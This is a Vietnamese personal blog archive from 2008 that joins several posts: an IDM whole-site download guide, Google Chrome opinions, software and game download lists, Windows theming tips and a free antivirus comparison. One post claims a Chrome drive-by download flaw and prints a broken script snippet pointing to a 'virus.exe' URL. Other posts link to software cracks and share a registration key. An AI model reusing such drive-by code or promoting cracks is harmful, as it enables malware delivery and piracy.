Internet Download Manager 5.14 build 4 + Portable Version + Hướng dẫn tải cả trang web bằng IDM 
Nguồn : http://namln.blogspot.com/
Được đăng bởi Lưu Nhật Nam vào lúc 9/02/2008 07:33:00 SA 
Thứba, 

Cảm ơn bạn đã đọc bài viết tại Lưu Nhật Nam's Blog. Nếu có sử dụng bài viết này xin bạn ghi rõ nguồn từ http://namln.blogspot.com. Nếu bạn gặp từ tiếng Anh nào không hiểu, hãy double click vào nó, sẽ có từ phiên dịch ngay! Chúc vui [image: image1.png]



     Một chức năng rất hay trong IDM bản 5. trở lên đó là tải cả trang web về máy, bài viết này xin hướng dẫn bạn cách làm này.



     Bước 1: bạn bấm vào nút Grabber trên thanh công cụ chương trình.

    - Trong cửa sổ hiện ra, bạn nhập tên dự án tại phần Grabber Project Name, tên trang cần tải tại Start page/adress, bạn bấm vào phần Project template có một danh sách bao gồm:

     + Custom Settings: tùy chọn.

     + All picture of the Web site: tải hình ảnh từ một trang Web.

     + Audio files from the start page…: tải tập tin âm thanh từ một trang Web.

     + All video files of the website: tải tập tin phim ảnh từ một trang Web.

     + All files of the Web site except…: tải tất cả tập tin ngoại trừ trang Web và hình ảnh.

     + The whole website: toàn bộ trang Web

     + Complete start page with a picture…: tải toàn bộ trang bắt đầu của trang Web đó.

Bạn chọn phần mong muốn, ở phần này tôi chọn Custom Settings để có thể tùy biến nhiều hơn. Ngoài ra, nếu trang Web bạn cần tải phải đăng kí thành viên bạn hãy đánh dấu vào Use authorization và điền tên và mật khẩu đăng nhập vào hai ô Login và Password rổi bấm Next để tiếp tục. 

      Bước 2: bạn đánh dấu vào All file to the following folder rồi chọn nơi lưu những gì tải được. Bạn nên đánh dấu chọn vào Use Original relative subfolder, Convert the links in downloaded… và Add checked files to IMD list and to…. Xong bạn bấm Next. 

  

       Bước 3: Ở cửa sổ tiếp theo sẽ có thêm vài tùy chọn là:

     + Explore the whole site: tìm kiếm trong website chính.

     + Explore the specified number of link level: tìm kiếm theo một giới hạn nhất định, nếu đánh dấu chọn vào phần này bạn phải gõ thêm số lượng link vào hai ô levels within the base site (của trang Web chính) và level of other sites (các trang Web liên quan). Bạn có thể tham khảo sơ đồ bên dưới để biết thế nào là trang Web chính và trang Web liên quan và số link: 

     + Ignore popup windows: bỏ chọn nếu bạn muốn “mang” thêm cả popup.

     + Exlporer all sites within the main domain: tìm kiếm cả các trang Web liên quan với trang bạn chọn.

     + Process JavaScript: tải luôn các đoạn mã javascript. Hãy coi chùng các đoạn mã “độc” đấy!

Nếu bạn chỉ muốn tìm trong một số liên kết hay muốn loại bỏ một số liên kết hãy bấm vào Advanced rồi đánh dấu Explore Web pages within… (những trang muốn tìm kiếm) hoặc Don’t explore Web pages… (những trang không muốn tìm kiếm). Bạn gõ những liên kết mình muốn (hoặc không muốn) tìm kiếm, nếu nhiều bạn cách bằng dấu “chấm phẩy” (;). Xong bấm Next để tiếp tục.

      Bước 4: Ở cửa sổ tiếp theo, bạn chọn những tập tin mình muốn download (hoặc không muốn) tại danh sách Download the following… và Don’t download the…. Nếu tập tin bạn cần không có trong danh sách, bạn bấm vào nút Add Filter > bấm nút Add > tại cửa sổ tiếp theo bạn gõ tên và loại của tập tin cần tải, OK hai lần để đồng ý. Lưu ý: loại của tập tin phải có *., ví dụ là *.doc hay *.exe, nếu nhiều hãy cách bằng dấu phẩy (,). Phần dưới có thêm hai tùy chọn là:

     + Search files on this site only: chỉ tìm và tải trong một trang đã chọn

     + Start downloading all matched files at once: chỉ tải các tập tin đã chọn một lần.

Nếu bạn muốn giới hạn kích thước hay vùng tải, bạn bấm vào nút Advanced. Bạn đánh dấu vào phần Not less than và Not more than sau đó chọn kích thước tối thiểu và tối đa được tải. Còn phần giới hạn vùng tải bạn làm tương tự phần bước 3. Xong bạn bấm Next để chương trình bắt đầu làm việc.

Trong lúc tải chương trình sẽ hiển thị cửa sổ trạng thái tải. Nếu chương trình chưa chịu tải luôn mà chỉ tìm kiếm, bạn hãy bấm vào nút Check all files và bấm tiếp Start Downloading the cheked files (hai nút này trên thanh công cụ của cửa sổ trạng thái).  

  
       Lưu ý: 
    - Nếu bạn gặp thông báo như sau thì có thể bạn chưa kết nối Internet hoặc bạn có tường lửa hoặc chương trình không tìm thấy địa chỉ trang Web bạn đã nhập. Cách khắc phục: hãy kết nối lại Internet, tắt tường lửa hoặc đóng cửa sổ báo lỗi lại, sau đó bấm nút Back vài lần và gõ lại địa chỉ trang Web muốn tải.

    - Nếu ở bước 1 bạn không chọn Custom Settings, thì các bước sau sẽ đơn giản hơn. Bạn chỉ cần chọn nơi lưu ở bước hai và bấm Next vài lần là xong.

    - Nếu bạn không muốn tải ngay mà muốn chờ hãy lưu lại Project sau đó bấm vào nút Schelduler the Project (hình đồng hồ). Việc này hãy thực hiện tại cửa sổ hiện ra ở bước 4.

_______________________

Bạn có thể tải IDM bản mới nhất tại đây là 5.14b4 Tải bản P@tch tại đây hoặc tại đây
Tải bản 5.14b4 Full tại đây 

Tải bản Portable tại đây  

______________

Lưu Nhật Nam
[Khi sử dụng bài viết này xin ghi nguồn là http://namln.blogspot.com] 
Email this • Email the author
Chủ đề: Internet - Network , Portable , Thủ thuật 
Bài mới hơn cùng chủ đề:
  Google Chrome Portable chạy ngay không cần cài đặt
  Google Chrome lỗi bảo mật - Code làm cho Google Chrome tải file về tự động
  MX ONE ANTIIRUS 3.8, BẢO VỆ TOÀN DIỆN KHỎI VIRUS LÂY LAN TỪ Ổ ĐĨA USB
  Windows Genuine - Biến Windows XP SP2, SP3 và Vista thành bản quyền [thành công 100%]
Bài cũ hơn cùng chủ đề:
  Hosting cho Website - Dễ mà khó
  2 BỘ SƯU TẬP HÀNG TRĂM PHẦN MỀM PORTABLE CHO USB
  10 CÁCH ĐƠN GIẢN VÀ HIỆU QUẢ NHẤT ĐỂ TIẾT KIỆM ĐIỆN CHO PC VÀ LAPTOP TRƯỚC CƠN "BÃO GIÁ"
Internet - Network,Portable,Thủ thuật 9/02/2008 07:33:00 SA 

1 nhận xét: 

Nặc danh nói... 

Thanks, du`ng IDM download thì nhanh và tiện dung hơn dùng chương trình khác nhiều.

18:37 Ngày 30 tháng 8 năm 2008 

 HYPERLINK "http://www.blogger.com/delete-comment.g?blogID=6273181809493593755&postID=2706010390581994092" \o "Xoá Nhận xét"   
Đăng một Nhận xét 

Đăng một Nhận xét

Cảm ơn bạn đã đọc bài viết. Nếu có thắc mắc, hay góp ý, bạn hãy để lại một nhận xét tại đây. Bạn không cần tài khoản vẫn có thể để lại lời nhắn. Mong bạn vui lòng gõ có dấu.
Được đăng bởi Lưu Nhật Nam vào lúc 9/04/2008 08:33:00 SA 

Thứnăm 

Cảm ơn bạn đã đọc bài viết tại Lưu Nhật Nam's Blog. Nếu có sử dụng bài viết này xin bạn ghi rõ nguồn từ http://namln.blogspot.com. Nếu bạn gặp từ tiếng Anh nào không hiểu, hãy double click vào nó, sẽ có từ phiên dịch ngay! Chúc vui [image: image3.png]



    

[image: image4.jpg]




     Một lỗi bảo mật khá nghiêm trọng của Google Chrome đã bị phát hiện! Đó là tự động tải một tập tin exe về mà không cần thông báo cho bạn biết! Còn việc chạy nó chỉ là "hên xui" ở bạn.
    Vì vậy đừng bao giờ dùng Google Chrome để truy cập vào trang web xa lạ, rất có thể mã độc sẽ được cài vào máy tính mà bạn không hề biết!
    Đoạn mã (chỉ xin giới thiệu cho mọi người biết), ai đó sử dụng vào mục đích xấu thì NamLN này không chịu trách nhiệm:

<script>

src="http://namln.blogspot.com/virus.exe"
</script>


    Sơ sơ là vậy thôi, tớ không dám đưa ra hoàn toàn vì sợ bị tội phát tán mã độc [image: image5.png]=R



   P/S: thông tin này NamLN lấy được từ một website tìm lỗi bảo mật, hiện chưa có thông tin chính thức về lỗi này.
    Tớ xin nhắc lại một lần nữa đừng bao giờ dùng Google Chrome để truy cập vào trang web xa lạ cho đến khi bác Google sửa lỗi này,  rất có thể mã độc sẽ được cài vào máy tính mà bạn không hề biết! 


[KHI SỬ DỤNG BÀI VIẾT NÀY XIN GHI NGUỒN LÀ HTTP://NAMLN.BLOGSPOT.COM] 
Được đăng bởi Lưu Nhật Nam vào lúc 9/03/2008 07:25:00 SA 
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Thứtư, 

Cảm ơn bạn đã đọc bài viết tại Lưu Nhật Nam's Blog. Nếu có sử dụng bài viết này xin bạn ghi rõ nguồn từ http://namln.blogspot.com. Nếu bạn gặp từ tiếng Anh nào không hiểu, hãy double click vào nó, sẽ có từ phiên dịch ngay! Chúc vui [image: image7.png]






     Một trình duyệt với tiêu chí nhỏ gọn, dễ tiếp cận do của ông lớn Google đã chính thức xuất hiện vào sáng ngày 03/09/2008. Thử nghiệm cho thấy Google Chrome có giao diện đơn giản, chức năng thì ở mức cơ bản, nhưng được cái rất dễ dùng, nhẹ nhàng và độ bảo mật chắc chắc là mạnh mẽ.
     Tuy nhiên, phần xem source của Google Chrome thì thể hiện khá dễ nhìn và chi tiết, thuật lợi cho các webmaster hoặc blogger "chôm source" [image: image9.png]






     Qua dùng thử trình duyệt này, tui vẫn không thể nào rời bỏ Firefox được. Tuy nhiên, đây vẫn là trình duyệt thử nghiệm mà thôi, cần phải để thời gian khẳng định khả năng của nó.
      Liệu Google Chrome có thay thế được Firefox và IE hay không? Hay thậm chí chỉ cần thay thế được Opera, MaxThon cũng được. Hay rồi rơi vào quên lãng như Google Pages, Google Code Search...? Bạn hãy để lại ý kiến nhé [image: image11.png]



    Dung lượng 400 KB tuy nhiên khi cài bạn phải truy cập vào Internet để tải thêm về thành phần.
Download tại đây 
[image: image12.png]


Thứtư, 

Cảm ơn bạn đã đọc bài viết tại Lưu Nhật Nam's Blog. Nếu có sử dụng bài viết này xin bạn ghi rõ nguồn từ http://namln.blogspot.com. Nếu bạn gặp từ tiếng Anh nào không hiểu, hãy double click vào nó, sẽ có từ phiên dịch ngay! Chúc vui [image: image13.png]



[image: image14.jpg]




Nhân ngày quốc khánh xin giới thiệu đến các bạn một số phần mềm hay thu thật được trong quá trình lướt web. [image: image15.png]




 INCLUDEPICTURE "http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/57.gif" \* MERGEFORMATINET [image: image16.png]




1/ Trắc nghiệm hóa học 2009 Phần 1 Phần 2

2/ Portable Coreldraw X4: phần mềm đồ họa kiêm chỉnh sửa ảnh vector.



3/ Portable Nero 8.2.8.0: phiên bản rút gọn của trình ghi đĩa nổi tiếng

4/ Portable Kaspersky Antivirus 2009: bản portable làm bằng Thinstall.

5/ Google Earth Pro: giúp bạn xem toàn bộ trái đất và các ảnh chụp cực nét từ vệ tinh, nếu may mắn, bạn có thể chụp hình được chính mình đấy[image: image18.png]
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6/ Zone Alarm with Antivirus 8.0.015: tường lửa cực mạnh cho máy tính kèm theo trình diệt virus

7/ Zone Alarm Security Suite 8.0.015:

8/ PPT Minimizer 4.0: thu nhỏ dung lượng file Powerpoint

9/ Portable Everest Ultimate 4.5: xem chi tiết cấu hình máy tính

10/ PC Tools Internet Security 2008: chương trình bảo mật của hãng PC Tools khá nổi tiếng

11/ PC Tools Disk Suite 2009: bộ công cụ dành cho đĩa cứn

Được đăng bởi Lưu Nhật Nam vào lúc 9/04/2008 01:13:00 CH 
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Thứnăm 

Cảm ơn bạn đã đọc bài viết tại Lưu Nhật Nam's Blog. Nếu có sử dụng bài viết này xin bạn ghi rõ nguồn từ http://namln.blogspot.com. Nếu bạn gặp từ tiếng Anh nào không hiểu, hãy double click vào nó, sẽ có từ phiên dịch ngay! Chúc vui [image: image21.png]



[image: image22.jpg]mmmmm





   Mặc cho những lời khen chê, và cả những lỗi bảo mật được phát hiện ra, Google Chrome vẫn thực sự tạo được một cơn sốt ở VN và toàn cả thế giới.
    Tuy nhiên, thật thiệt thòi cho những ai không có Internet [image: image23.png]


vì quá trình cài đặt Google Chrome đòi hỏi bạn phải kết nối Internet, và Google Chrome Portable là một giải pháp để bạn có thể thử trình duyệt này mà không cần cài đặt.
Dung lượng 13 MB
Tải tại đây
[image: image24.png]


1 Comment • Email this • Email the author



Chủ đề: Internet - Network , Portable 
Đang tìm các bài liên quan...

Internet - Network,Portable 9/04/2008 01:13:00 CH 

1 nhận xét: 

Ngân nói... 

uhm ! mình có làm 1 cái portable , muốn cho nó nhẹ nên xoá hết cache , hostory , rồi cả cái file .rar trong đó nữa ( tưởng GC ko xài tới ) sau đó nén lại , xài thấy tốt . Lúc đem qua máy khác thì ko xài đc gì hết :D

[image: image26.png]


Thứbảy 

Cảm ơn bạn đã đọc bài viết tại Lưu Nhật Nam's Blog. Nếu có sử dụng bài viết này xin bạn ghi rõ nguồn từ http://namln.blogspot.com. Nếu bạn gặp từ tiếng Anh nào không hiểu, hãy double click vào nó, sẽ có từ phiên dịch ngay! Chúc vui [image: image27.png]



     1/ Battle RUSH: Game Missile Tank nổi tiếng của Nintendo thời điện tử băng còn thịnh hành nay đã được “tái sinh” với một giao diện 3D và âm thanh tuyệt vời trong game Battle Rush (BR). Trong BR, bạn vẫn phải điều khiển xe tăng của mình phá gạch, băng qua rừng để bắn xe tăng địch nhưng vẫn không được quên bảo vệ căn cứ (hình chiếc huy chương được gạch che chở ở dưới bản đồ). Ngoài ra bạn còn được hỗ trợ bằng các vật phẩm như ngôi sao (nâng cấp xe tăng), cái xẻng (bảo vệ căn cứ bằng kim loại), đồng hồ (đóng băng xe tăng địch)… Lưu ý rằng tuy bạn có 5 “mạng” để chơi nhưng nếu căn cứ bị phá hủy thì bạn sẽ bị thua ngay nên bảo vệ căn cứ là một nhiệm vụ rất quan trọng.

      Game được bài trí từng cảnh rất giống với những gì game Missile Tank đã từng làm. Dù game được thiết kế 3D nhưng bạn vẫn có thể vào mục Options để điều chỉnh thành giao diện 2D như các game cũ. Để điều khiển xe tăng bạn dùng các phím mũi tên và bắn bằng nút cách (Space bar). Với người chơi thứ hai thì dùng phím W, A, S, D và bắn bằng nút Control.

      BR hoàn toàn miễn phí và có dung lượng 5 MB, bạn có thể tải tại đây Mở khóa full 50 cảnh tại đây
      Ai chơi bị lật ngược thì vào Options > Video > bỏ chế độ Fullscreen thành NO là được. 




     2/ Tank O Box 1.2: game này đã quá nổi tiếng, cách chơi tương tự game trên.




Dung lượng 7 MB, tải bản full tại đây
     3/ Armada Tanks 1.2: dung lượng 10 MB, tải tại đây!



Lưu Nhật Nam 
[Khi sử dụng bài viết này xin ghi nguồn là http://namln.blogspot.com] 
Được đăng bởi Lưu Nhật Nam vào lúc 9/03/2008 08:20:00 CH 
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Thứtư, 

Cảm ơn bạn đã đọc bài viết tại Lưu Nhật Nam's Blog. Nếu có sử dụng bài viết này xin bạn ghi rõ nguồn từ http://namln.blogspot.com. Nếu bạn gặp từ tiếng Anh nào không hiểu, hãy double click vào nó, sẽ có từ phiên dịch ngay! Chúc vui [image: image32.png]
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     Hôm nay dạo qua các blog, các forum, thấy chỗ nào cũng tràn ngập bài viết về Google Chrome, bài tự viết có, bài dịch có, và bài viết "chôm không ghi nguồn" cũng có [image: image34.png]


Ngay tại NamLN Blog cũng có một bài nho nhỏ về trình duyệt này [image: image35.png]


Quả là sức lan tỏa và tốc độ của cộng đồng mạng là quá lớn.

    Tuy nhiên, thấy một sự thật rõ ràng, đó là bài khen nhiều hơn chê. Có nhiều lời khen cỡ chừng "lên mây" như "GC hoàn toàn có thể thay thế IE trong tương lai gần" hay đại loại "GC không thua gì Firefox"., hay lời bình luận cỡ như "Em chuyển qua Google Chrome xài đây" .. Đến đây tớ đặt vấn đề là GC có xứng đáng được lời khen như vậy?

     Quả thực khi dùng thử GC tớ thấy nó nhẹ thật, lướt web nhanh thật, bảo mật thật, có mấy tính năng thú vị thật... nhưng xét qua tổng thể thì "có vẻ" GC chưa thể sánh được với Opera, Safari chứ đừng nói là đòi bằng Firefox và chiếm thị phần của Internet Explorer. Thực tế thì tớ và một số người quen sau khi dùng qua GC vẫn trung thành với Firefox, trình duyệt nguồn mở, mạnh mẽ và nhiều add-on hỗ trợ.

     Tuy nhiên, đây là một trình duyệt của ông lớn Google, và hiện nó đang ở bản Beta nên khó mà hoàn thiện được, biết đâu tương lai nó có thể làm được như những lời dự đoán thì sao. Gì chớ hiện tại thì khó mà được vậy. Chắc bác Google cũng biết vậy mà không ngủ quên trên mây đâu nhỉ [image: image36.png]


. Rồi thì Google Chrome sẽ lên đỉnh Everest như Google Search, Google Mail hay lại rồi chìm nghỉm xuống khe Marian như Google Page, Google Code search... Tất cả đang chờ phiên bản mới của bác đấy bác Gu ạ [image: image37.png]



    Suy nghĩ của tớ là thế thôi, mọi người nghĩ thế nào cứ comment nha. 
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Thứhai 

Cảm ơn bạn đã đọc bài viết tại Lưu Nhật Nam's Blog. Nếu có sử dụng bài viết này xin bạn ghi rõ nguồn từ http://namln.blogspot.com. Nếu bạn gặp từ tiếng Anh nào không hiểu, hãy double click vào nó, sẽ có từ phiên dịch ngay! Chúc vui [image: image39.png]



1/ Dùng các chương trình thay đổi giao diện máy tính: có 2 chương trình thay đổi giao diện nổi tiếng hiện nay là Style XP và Windows Blinds.
- Ưu điểm của phương pháp này là bạn có thể dễ dàng thay đổi nhiều skin khác nhau mà nhà sản xuất cung cấp và còn có thể tải thêm từ trang Web của phần mềm. Đặc biệt Windows Blind có thể giả lập khá hoàn hảo giao diện trong suốt của Vista.
- Tuy nhiên, các chương trình này có nhược điểm lớn đó là rất hao tổn tài nguyên máy tính, có thể làm chậm quá trình khởi động, hoạt động và tắt máy rất nhiều nếu cấu hình máy không mạnh.
- Bạn có thể tải và sử dụng Style XP 3 miễn phí tại http://download.tgtsoft.com/StyleXPInstallMale.zip (18.5 MB) hoặc http://download.tgtsoft.com/StyleXPInstallFemale.zip (22.4 MB). Tải bản dùng thử Windows Blinds 6 tại http://www.mediafire.com/?awryd3dxihw hoặc http://www.mediafire.com/?ey2egm2e1ng (khoảng 16 MB).





- Ngoài ra, còn có một chương trình nhỏ miễn phí nhưng vẫn có nhiều bộ giao diện cho bạn chọn và sử dụng rất ít RAM, đó là Styler. Bạn có thể tải tại http://tinyurl.com/65hmzc, 700 KB.

2/ Dùng các bộ giao diện máy tính:
- Ưu điểm của các bộ giao diện này là thay đổi toàn bộ giao diện máy tính từ màn hình khởi động, taskbar,… cho đến các icon ổ đĩa, thư mục, tập tin… Một số bộ còn kèm theo các chương trình nhỏ để bổ sung như Sidebar, Gadget… Các bộ giao diện này thường không làm chậm máy tính đi nhiều nên dù máy tính yếu vẫn có thể hoạt động được, riêng các phần mềm nhỏ đi kèm có thể dùng nhiều RAM và bạn có thể dễ dàng tắt nó đi.
- Nhược điểm duy nhất của cách này là do can thiệp sâu vào hệ thống nên quá trình cài có thể bị lỗi và không thành công. Bạn có thể giải quyết dễ dàng bằng cách cài đặt ở trong Safe Mode.
- Một số bộ giao diện nổi tiếng:
+ Các Brico Pack: gồm 4 bộ giao diện khác nhau, mỗi bộ đều có một giao diện, icon, taskbar riêng. Gồm Vista Inspirat, Longhorn Inspirat, Crystal XP, Crystal Clear. Bạn có thể tải và sử dụng miễn phí tại http://www.crystalxp.net/bricopack/en.htm.


+ Vista Transfomation Pack 8: bộ giả lập giao diện Vista nổi tiếng từ rất lâu. Phiên bản 8 giả lập Vista khá hoàn hảo, có thể nói giao diện Windows XP của bạn sẽ giống Vista từ các cửa sổ trong suốt, start menu cho đến tính năng Taskbar Thumbnail, Flip 3D v.v…, Bạn có thể tải bản 8 miễn phí trực tiếp tại http://www.getvtp.com/dl.php4?file=dl/VTP801.exe (27.54 MB) hoặc tìm thêm các link khác tại http://www.getvtp.com.
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+ Flyakite OSX: bộ giao diện này giả lập khá giống với Mac OSX của hãng Apple. Bạn có thể tải miễn phí tại http://www.flyakiteosx.com/files/FlyakiteOSX%20v3.0.zip (29.38 MB).
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3/ Dùng các Visual Styte (VS): Windows XP đã có sẵn vài VS cho bạn chọn nhưng các VS đều có giao diện tương tự nhau và không được đẹp. Vì thế mà nhiều “vọc sĩ” trên mạng đã bào chế thêm các VS để làm đẹp cho windows.
- Ưu điểm của các VS là không hề làm chậm đi máy tính, hoặc có chậm rất ít, phù hợp với máy cấu hình yếu.
- Nhược điểm là VS chỉ có thể thay đổi bề ngoài mà thôi, các icon, ổ đĩa, thư mục… sẽ không thay đổi.
- Để dùng được các VS bạn cần phải có UX Theme Patch (tải tại http://www.llbbl.com/data/nw_uxpatcher.zip - 800 KB), tải về bạn chạy chương trình này, nếu có yêu cầu bỏ đĩa windows vào bạn cứ Cancel, cuối cùng khởi động lại máy.

- Cuối cùng bạn hãy tải các VS này từ một trong các trang như http://www.favista.cn/, http://www.skinbase.org/Skins/msstyles/135, http://tinyurl.com/yfgp52, chọn một trong các VS được cung cấp rồi bấm Download để tải về. Dung lượng của một VS chỉ khoảng vài MB. Hoặc bạn có thể tải bộ gồm 20 VS do tác giả sưu tầm kèm theo UXTheme Patch tại http://files.myopera.com/medown1/files/VistaThemesPack.rar (12.7 MB). Tải về giải nén ra, bạn bấm đúp vào file có định dạng msstyles, trong hộp thoại Display Properties hiện ra bạn bấm OK để áp dụng giao diện này.

4/ Các chương trình nhỏ để trang trí máy tính: hiện có nhiều chương trình nhỏ, dung lượng chỉ vài trăm KB nhưng giúp bạn có thể làm đẹp máy tính mình lên khá nhiều. Một ưu điểm nữa là đa số các chương trình này đều miễn phí, tiêu biểu có:
- Vista Drive Icon: biến ổ đĩa có biểu tượng giống như windows Vista, kèm theo cả thanh thông báo dung lượng. Tải tại http://nchc.dl.sourceforge.net/sourceforge/drvicon/VistaDriveIcon_1.4_Setup.exe, dung lượng 133 KB.

- TrueTransparency: chương trình có thể làm thanh tiêu đề và đường viền của cửa sổ trong suốt y hệt Vista với nhiều hiệu ứng rất đẹp, khi chạy TrueTransparency chỉ dùng khoảng 3 MB RAM chứ không nhiều như các chương trình khác. Tải tại http://tinyurl.com/5mownq dung lượng khoảng 300 KB, tải về giải nén là có thể dùng ngay.
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- Rocket Dock: chương trình sẽ tạo một thanh công cụ với hiệu ứng trong suốt tuyệt đẹp ở phía trên desktop chứa các shortcut giúp bạn nhanh chóng truy cập các thư mục, chương trình hay dùng. Rocket Dock có sẵn nhiều kiểu giao diện cho bạn chọn. Tải tại http://files.punklabs.com/RocketDock/RocketDock-v1.3.5.exe (6.5 MB).

- Vista Start Menu Emulator: với chương trình này bạn sẽ có một start menu giống hệt Windows Vista. Tải tại http://tinyurl.com/6mty3f, dung lượng 200 KB. Tải về giải nén là có thể dùng ngay.

- Visual Task Tips: ứng dụng này sẽ tạo một hình thu nhỏ của cửa sổ khi bạn rê chuột vào thanh taskbar tương tự tính năng Taskbar Thumnail của Vista. Bạn tải tại http://www.visualtasktips.com/download.php, dung lượng 100 KB.

- Pod XP: nếu bạn từng srử dụng Yahoo Widget Engine chắc chắn sẽ ấn tượng với hàng chục ứng dụng nhỏ được cung cấp ở trên desktop. Và Pod XP cũng là một chương trình như vậy, bạn sẽ có các chương trình như trình chơi nhạc, ghi chú, theo dõi tin tức,… trên desktop với nhiều giao diện tuyet đẹp. Bạn có thể tải tại http://tinyurl.com/4jvvmy, dung lượng 6 MB.


5/ Trang trí cho từng ứng dụng: có lẽ bạn đã quá quen thuộc với việc thay đổi giao diện cho Yahoo Messenger, Windows Media Player, WinAmp… Bài viết xin hướng dẫn bạn cách thay đổi giao diện của 2 chương trình quen thuộc đó là WinRar và Internet Download Manager.
- Với WinRAR, bạn có thể tải các bộ giao diện tại http://www.rarlab.com/themes.htm, tập tin tải về có định dạng *.rar. Bạn bấm đôi vào file tải được chọn OK trong hộp thoại xuất hiện. Cuối cùng, để đổi giao diện, tại giao diện chính WinRAR, bạn vào menu Options > Theme > chọn giao diện.
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- Internet Download Manager: bạn tải các giao diện tại http://www.internetdownloadmanager.com/support/toolbar2.html. Tải về, giải nén rồi chép tất cả tập tin vào thư mục C:\Program Files \Internet Download Manager\Toolbar. Tại giao diện IDM, bạn vào menu View > Toolbar, rồi chọn một trong các giao diện được cung cấp.
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Thứba, 

Cảm ơn bạn đã đọc bài viết tại Lưu Nhật Nam's Blog. Nếu có sử dụng bài viết này xin bạn ghi rõ nguồn từ http://namln.blogspot.com. Nếu bạn gặp từ tiếng Anh nào không hiểu, hãy double click vào nó, sẽ có từ phiên dịch ngay! Chúc vui [image: image46.png]



    Khi Internet ngày càng thông dụng thì các mối nguy hiểm như virus, spyware lại càng đe dọa người dùng nhiều hơn. Bài viết này giới thiệu 6 chương trình diệt miễn phí nổi tiếng nhất hiện nay nhằm hỗ trợ độc giả của tạp chí Điện tử- CNTT trong việc tìm kiếm một chương trình diệt virus phù hợp cho máy tính của mình. Với các chương trình này, bạn không phải trả một khoản phí nào cả nhưng vẫn được sự bảo vệ tốt nhất. 

     1/ AVG Antivirus Free 8.0 (AVG):
     Với dung lượng 45 MB, bạn có thể tải tại http://free.grisoft.com/ww.download?prd=afe hoặc http://tinyurl.com/72jvg.

    Đây hiện là chương trình diệt virus được sử dùng nhiều nhất trên thế giới với hơn 80 triệu người dùng. AVG có cơ sở dữ liệu (CSDL) khoảng 300.000 mẫu nhận dạng với các chức năng chống virus, spyware bảo vệ email và trình duyệt.

[image: image47.jpg]e
T M
o

" Socunty compononts and status ovorviow

T P
= el Cric
o .

- e Vol (v

g Ut Marager

orten ot st comerert





Tuy AVG có tính năng quét và bảo vệ rất mạnh nhưng khi sử dụng AVG dùng đến 50 MB RAM và khi quét dùng đến 85 MB RAM! Để quét bằng AVG, bạn vào thẻ Computer scanner rồi chọn Scan Whole Computer (quét cả máy tính) hay Scan specific files or folders (quét một vùng nhất định). Tốc độ quét của AVG khá nhanh, mất khoảng 15 phút cho ổ đĩa hệ thống với chế độ quét thông thường.

Để cập nhật cho AVG, bạn có thể vào thẻ Update Now để cập nhật trực tuyến hoặc vào trang Web http://www.grisoft.com/ww.download-update để tải file cập nhận offline về (định dạng *.bin). Sau khi tải về bạn vào menu Tools > Update from directory rồi chọn thư mục chứ file bin đã tải về đó.

2/ Avira AntiVir Personal 2008 (AA): 
Chương trình này có dung lượng 21 MB và bạn có thể tải tại http://tinyurl.com/ytlmac hoặc http://dl1.avgate.net/down/windows/antivir_workstation_winu_en_h.exe.

Chương trình bảo mật của hãng Avira có chức năng bảo vệ máy tính khỏi virus, rootkit... và chống các trang Web lừa đảo với khoảng hơn 1 triệu mẫu trong CSDL. Đây là con số ấn tượng nhất trong tất cả các trình diệt virus hiện nay, và đã được tạp chí PC Pro của Anh (http://www.pcpro.co.uk) chọn là chương trình diệt virus hiệu quả nhất.

Để quét với AA, bạn vào mục Local protection > Scanner rồi chọn một trong các kiểu quét mà chương trình cung cấp sẵn rồi bấm F3 để tiến hành quét. Đặc biệt, AA cũng hỗ trợ quét Boot Record bằng cách vào menu Extras > Boot Record scan. Thử nghiệm quét ổ đĩa hệ thống sử dụng 6 GB với 95546 tập tin AA mất tổng cộng 7 phút để quét và chỉ dùng tối đa 20 MB RAM.
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AA hỗ trợ cả 2 hình thức cập nhật là online và offline. Để cập nhật online thì bạn vào menu Update > Start Update, tốc độ cập nhật của AA rất nhanh, chỉ mất khoảng hơn 1 phút. Để cập nhật offline, bạn tải file cập nhật tại http://dl.antivir.de/down/vdf/ivdf_fusebundle_nt_en.zip (khoảng 20 MB), tai giao diện của AA, bạn vào menu Update > Manual Update > rồi chọn tập tin được tải về để cập nhật.

3/ avast! Antivirus Home Edition 4.8 (aA):
Tải tại http://download613.avast.com/iavs4pro/setupeng.exe, dung lượng 23 MB.

Ngoài các tính năng tương tự chương trình khác, aA còn có một tính năng rất hay đó là quét virus trước khi vào windows, với chức năng này thì không một loại virus nào có thể thoát khỏi, để bật chức năng này lên bạn chỉ cần chọn nút Yes trong hộp thoại hiện ra lúc cài đặt.
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Để sử dụng được aA bạn cần phải có số đăng kí miễn phí, đăng kí tại http://www.avast.com/eng/home-registration.php, hoặc bạn dùng số tôi đã đăng kí là W78317563H5500A1106-HXZYZ4FP.

AA có một giao diện khá lạ mắt và hơi khó sử dụng nhưng vẫn thu hút được trên 50 triệu người dùng nhờ tính năng bảo mật khá toàn diện, ngoài chống virus, aA còn bản vệ bạn khỏi rootkit và cả spyware, quét thư trong email với CSDL khoảng hơn 180000 mẫu nhận dạng. Ngoài ra, aA còn có một số tính năng bảo vệ mạnh mẽ khác như bảo vệ qua mạng ngang hàng (Peer to Peer), khi lướt web, khi chat (instant messenger) (điều mà đa số các chương trình miễn phí khác không có)..., bạn có thể nhanh chóng tạm dừng hoặc khởi động các tính năng này qua menu chuột phải khi bấm vào biểu tượng chữ a xoay tròn dưới taskbar.
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Để quét, bạn hãy bấm chuột phải vào giao diện, chọn Start Scan, tiếp tục chọn hình thức quét trong mục Select scan area và mức độ quét ở Select scan level. Thử nghiệm quét ổ C:\ aA chỉ tốn mất 4 phút 47 giây nhưng sử dụng một lượng RAM lên đến 67 MB nhưng lúc chạy nền bảo vệ máy tính aA chỉ dùng 15 MB RAM mà thôi!
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Để cập nhật online với aA, ban hãy chọn mục Updating > iAVS Update tại menu ngữ cảnh. Hoặc bạn thiết lập cho aA tự động cập nhật bằng cách vào Settings > Update > đánh dấu chọn vào Automatic của 2 mục Virus Database và Program. Nếu nhà không có mạng và muốn cập nhật offline thì bạn tải file update với dung lượng khoảng 14 MB tại http://files.avast.com/iavs4pro/vpsupd.exe, tải về và chạy nó là xong.

4/ Comodo Antivirus 2.0 (CA):
Dung lượng 34.61 MB, tải tại:
http://download.comodo.com/cav/download/CAVS_Setup_2.0.17.58_Beta.exe.

CA có CSDL khoảng hơn 260.000 mẫu nhận dạng virus, ngoài tính năng bảo vệ thông thường, CA cũng có khả năng quét các email mà máy tính gửi và nhận.
